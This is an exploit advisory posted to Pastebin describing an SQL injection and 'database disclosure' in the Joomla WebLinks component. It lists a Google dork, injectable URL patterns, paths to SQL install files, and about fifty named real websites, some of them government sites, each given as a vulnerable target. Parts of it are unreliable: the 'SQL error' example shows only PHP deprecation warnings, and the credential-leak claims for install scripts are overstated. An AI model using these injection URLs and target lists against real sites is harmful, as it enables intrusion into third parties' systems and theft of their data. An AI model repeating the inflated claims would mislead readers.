Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla WebLinks 3.6.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/02/2019
- # Vendor Homepage : joomla.org
- # Software Download Link :
- downloads.joomla.org/extensions/weblinks/3-6-0/pkg-weblinks-3-6-0-zip?format=zip
- github.com/joomla-extensions/weblinks
- # Software Information Link :
- extensions.joomla.org/extensions/extension/official-extensions/weblinks/
- # Software Versions : 3.4.0 - 3.4.1 - 3.5.0 - 3.6.0 and other previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_weblinks''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Old Similar CVE : CVE-2010-2679
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The Web Links Manager allows you to add, edit and remove links to other web sites
- on your Joomla! web site, and organize them into categories.
- You can then display these links on your site, and optionally let visitors add new links.
- ####################################################################
- # Impact :
- ***********
- * SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla!
- allows remote attackers to execute arbitrary SQL commands
- via the id parameter in a view action to index.php.
- Joomla WebLinks 3.6.0 and other versions - component for Joomla is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_weblinks&Itemid=[SQL Injection]
- /index.php?option=com_weblinks&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_weblinks&view=categories&Itemid=[SQL Injection]
- /index.php?option=com_weblinks&task=view&catid=[ID-NUMBER]&id=[SQL Injection]
- /index.php?option=com_weblinks&view=category&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_weblinks&view=category&id=[ID-NUMBER]%3[FOLDER-NAME]&Itemid=[SQL Injection]
- /index.php?option=com_weblinks&view=category&id=[ID-NUMBER]%3[FOLDER-NAME]&format=feed&type=[SQL Injection]
- # Database Disclosure Exploit :
- ****************************
- /administrator/components/com_weblinks/sql/install.mysql.sql
- /administrator/components/com_weblinks/sql/install.postgresql.sql
- /administrator/components/com_weblinks/sql/install.sqlsrv.sql
- /administrator/components/com_weblinks/sql/uninstall.mysql.sql
- /administrator/components/com_weblinks/sql/uninstall.postgresql.sql
- /administrator/components/com_weblinks/sql/uninstall.sqlsrv.sql
- /administrator/components/com_weblinks/sql/updates/mysql/3.4.0.sql
- /administrator/components/com_weblinks/sql/updates/mysql/3.5.1.sql
- /administrator/components/com_weblinks/sql/updates/postgresql/3.4.0.sql
- /administrator/components/com_weblinks/sql/updates/sqlsrv/3.4.0.sql
- /administrator/components/com_weblinks/sql/install.mysql.utf8.sql.encrypted
- /administrator/components/com_weblinks/sql/uninstall.mysql.utf8.sql.encrypted
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] sunshrine.com/administrator/components/com_weblinks/sql/uninstall.mysql.utf8.sql.encrypted
- [+] murphyspub.de/administrator/components/com_weblinks/sql/install.mysql.sql
- [+] freightdb.kzntransport.gov.za/administrator/components/com_weblinks/sql/install.mysql.utf8.sql
- [+] itcp.ifba.edu.br/index.php?option=com_weblinks&Itemid=23%27
- [+] bosfinancesupport.nl/index.php?option=com_weblinks&Itemid=23%27
- [+] villaurbana.net/cultura/index.php?option=com_weblinks&Itemid=23%27
- [+] hangterapia.hu/index.php?option=com_weblinks&catid=4&Itemid=49%27
- [+] clubepuntogt.com/index.php?option=com_weblinks&catid=4&Itemid=6%27
- [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_weblinks&catid=35&Itemid=23%27
- [+] esgdl.com/index.php?option=com_weblinks&Itemid=23%27
- [+] braeuwiese.at/index.php?option=com_weblinks&view=categories&Itemid=11%27
- [+] tennishalulrum.nl/site/index.php?option=com_weblinks&catid=1&Itemid=5%27
- [+] awfa.asn.au/site/index.php?option=com_weblinks&catid=55&Itemid=23%27
- [+] oldboys.pl/index.php?option=com_weblinks&Itemid=22%27
- [+] joomla.hitzblech-markierung.de/index.php?option=com_weblinks&Itemid=23%27
- [+] ff-feistritz.at/ff/index.php?option=com_weblinks&view=category&id=8&Itemid=17%27
- [+] nymannings.net/main/index.php?option=com_weblinks&view=category&id=2&Itemid=48%27
- [+] smuki.smusa.sg/cms/index.php?option=com_weblinks&catid=30&Itemid=23%27
- [+] mrmfirm.com/us/index.php?option=com_weblinks&view=category&id=36&Itemid=61%27
- [+] ruda.awardspace.com/index.php?option=com_weblinks&Itemid=23%27
- [+] mbp-podkowalesna.pl/archiwum/index.php?option=com_weblinks&catid=54&Itemid=22%27
- [+] bernd-otten.de/joomla/index.php?option=com_weblinks&Itemid=23%27
- [+] hamishpage.biz/index.php?option=com_weblinks&Itemid=23%27
- [+] note-quetscher.ch/index.php?option=com_weblinks&view=categories&Itemid=55%27
- [+] nogeensite.nl/index.php?option=com_weblinks&itemid=4%27
- [+] deshodaya.sarvodaya.org/index.php?option=com_weblinks
- &view=category&id=2%3Ajoomla-specific-links&Itemid=48%27
- [+] nwbcisbasketball.com/index.php?option=com_weblinks
- &view=category&id=41%3Adirections&Itemid=68%27
- [+] koczorowski.info/index.php?option=com_weblinks&Itemid=23%27
- [+] llpm.com.my/index.php?option=com_weblinks&view=category&id=44&Itemid=48%27
- [+] hogreve.com/index.php?option=com_weblinks&Itemid=23%27
- [+] lastanza.tempodelsogno.com/joomla/index.php?option=com_weblinks&catid=24&Itemid=72%27
- [+] imbotero.com/index.php?option=com_weblinks&view=categories&Itemid=48%27
- [+] purepassion.us/web/index.php?option=com_weblinks&view=category&id=21&Itemid=202%27
- [+] digitalfactor.com/index.php?option=com_weblinks&view=categories&Itemid=48%27
- [+] cataniaviva.altervista.org/index.php?option=com_weblinks&Itemid=23%27
- [+] encuentrotodo.atwebpages.com/index.php?option=com_weblinks&Itemid=23%27
- [+] bergmix.com/index.php?option=com_weblinks&Itemid=23%27
- [+] fotoespacio.cl/portal/index.php?option=com_weblinks&view=
- category&id=64%3Acolectivos&format=feed&type=1%27
- [+] lichtwelle.com/index.php?option=com_weblinks&Itemid=4%27
- [+] massimopisera.altervista.org/joomla/index.php?option=com_weblinks&view=categories&Itemid=48%27
- [+] ceder.org.pe/portal/index.php?option=com_weblinks&Itemid=76%27
- [+] andyduffy.com/cms/index.php?Itemid=60&catid=25%27&option=com_weblinks
- [+] malchin.uv.gov.mn/index.php?option=com_weblinks&view=
- category&id=38%3Agovernmentorgs&Itemid=48&format=feed&type=1%27
- [+] reuwsaat2.de/index.php?option=com_weblinks&Itemid=23%27
- [+] betriebsplanungen.de/index.php?option=com_weblinks&Itemid=23%27
- [+] rhughesrealty.com/index.php?option=com_weblinks&Itemid=23%27
- [+] naagol.com/index.php?option=com_weblinks&view=categories&Itemid=48%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Assigning the return value of new by reference is
- deprecated in /home/cpgt/public_html/includes/joomla.php on line 829
- Deprecated: preg_replace(): The /e modifier is deprecated, use
- preg_replace_callback instead in /home/cpgt/public_html
- /includes/phpInputFilter/class.inputfilter.php on line 457
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment